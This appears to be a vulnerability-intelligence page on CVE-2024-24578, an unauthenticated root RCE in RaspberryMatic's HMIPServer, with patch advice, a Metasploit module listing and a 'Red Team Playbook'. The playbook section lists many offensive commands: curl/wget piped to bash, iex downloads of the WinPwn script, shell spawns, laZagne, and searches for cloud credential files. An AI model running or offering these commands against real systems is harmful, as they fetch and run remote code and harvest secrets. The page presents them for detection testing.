CVE-2024-24578
Overview
This vulnerability is an unauthenticated remote code execution flaw caused by improper access control in the Java-based HMIPServer component of RaspberryMatic. Specifically, the FirmwareController class fails to validate session IDs for requests made to URLs under /pages/jpages, allowing unrestricted access to sensitive functionality. The root cause lies in missing session authentication checks within the FirmwareController, enabling execution of arbitrary code with root privileges.
Vulnerability Description
RaspberryMatic is an open-source operating system for HomeMatic internet-of-things devices. RaspberryMatic / OCCU prior to version 3.75.6.20240316 contains a unauthenticated remote code execution (RCE) vulnerability, caused by multiple issues within the Java based `HMIPServer.jar` component. RaspberryMatric includes a Java based `HMIPServer`, that can be accessed through URLs starting with `/pages/jpages`. The `FirmwareController` class does however not perform any session id checks, thus this feature can be accessed without a valid session. Due to this issue, attackers can gain remote code execution as root user, allowing a full system compromise. Version 3.75.6.20240316 contains a patch.
Impact
An attacker with network access can exploit this vulnerability without any authentication or user interaction, gaining root-level code execution on the affected device. This enables full system compromise, including unauthorized control over HomeMatic IoT infrastructure, data manipulation, or persistent backdoor installation. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms remote, unauthenticated exploitation with complete confidentiality, integrity, and availability impact.
Solution
Users should upgrade RaspberryMatic to version 3.75.6.20240316 or later, which includes patches addressing the session validation bypass in the HMIPServer component. Detailed patch instructions and advisory information are available at the official RaspberryMatic GitHub security advisory page (https://github.com/jens-maus/RaspberryMatic/security/advisories/GHSA-q967-q4j8-637h). No alternative mitigations are provided by the vendor.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the open-source operating system for HomeMatic internet-of-things devices is a critical issue that allows unauthenticated remote code execution due to flaws in the Java-based `HMIPServer.jar` component. Specifically, the vulnerability arises from inadequate session management within the `FirmwareController` class, which does not enforce session ID checks. This oversight permits unauthorized users to access sensitive functionalities through URLs prefixed with `/pages/jpages`, effectively bypassing any authentication mechanisms. The implications of this flaw are severe, as it enables attackers to execute arbitrary code with root privileges, leading to a complete compromise of the affected system.
Attack vectors for exploiting this vulnerability are straightforward and can be executed remotely, making it particularly dangerous in environments where devices are exposed to the internet. An attacker could craft a malicious request to the `HMIPServer` without needing any valid credentials, thereby gaining access to the system's core functionalities. Once inside, the attacker could deploy malware, manipulate device settings, or even pivot to other connected devices within the network. Scenarios could include turning off security systems, accessing sensitive data, or using the compromised device as a launchpad for further attacks against other systems or networks.
The real-world impact of this vulnerability is significant, especially considering the increasing reliance on internet-connected devices in both residential and commercial settings. A successful exploitation could lead to unauthorized access to home automation systems, potentially compromising user privacy and safety. For businesses, the risks extend beyond immediate financial loss; they include reputational damage, loss of customer trust, and potential legal liabilities stemming from data breaches. The ability for an attacker to gain root access means that they could manipulate the device in ways that could disrupt operations or lead to further vulnerabilities in connected systems.
To detect and mitigate this vulnerability, organizations should prioritize updating to the patched version of the operating system, as it addresses the session management flaw. Regularly monitoring network traffic for unusual patterns or unauthorized access attempts can also help in identifying potential exploitation attempts. Implementing network segmentation to isolate IoT devices from critical infrastructure can limit the potential damage from a compromised device. Additionally, employing intrusion detection systems (IDS) can provide alerts on suspicious activities, allowing for quicker incident response. Finally, educating users about the importance of securing their devices and ensuring that default configurations are changed can further reduce the attack surface.
In conclusion, the unauthenticated remote code execution vulnerability in the open-source operating system for HomeMatic devices represents a critical threat to both individual users and organizations. The ease of exploitation, combined with the potential for severe consequences, necessitates immediate attention and action from all stakeholders involved. By understanding the technical details, potential attack vectors, real-world impacts, and effective mitigation strategies, organizations can better prepare themselves against this and similar vulnerabilities in the ever-evolving landscape of cybersecurity threats.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Raspberrymatic | Raspberrymatic | All |
cpe:2.3:o:raspberrymatic:raspberrymatic:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
RaspberryMatic unauthenticated Remote Code Execution vulnerability through HMServer File Upload.
exploits/linux/http/raspberrymatic_unauth_rce_cve_2024_24578
|
- | Unknown | unix, linux | View |
Threat Feed
1 eventsPublic exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-24578 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/jens-maus/RaspberryMatic/security/advisories/GHSA-q967-q4j8-637h |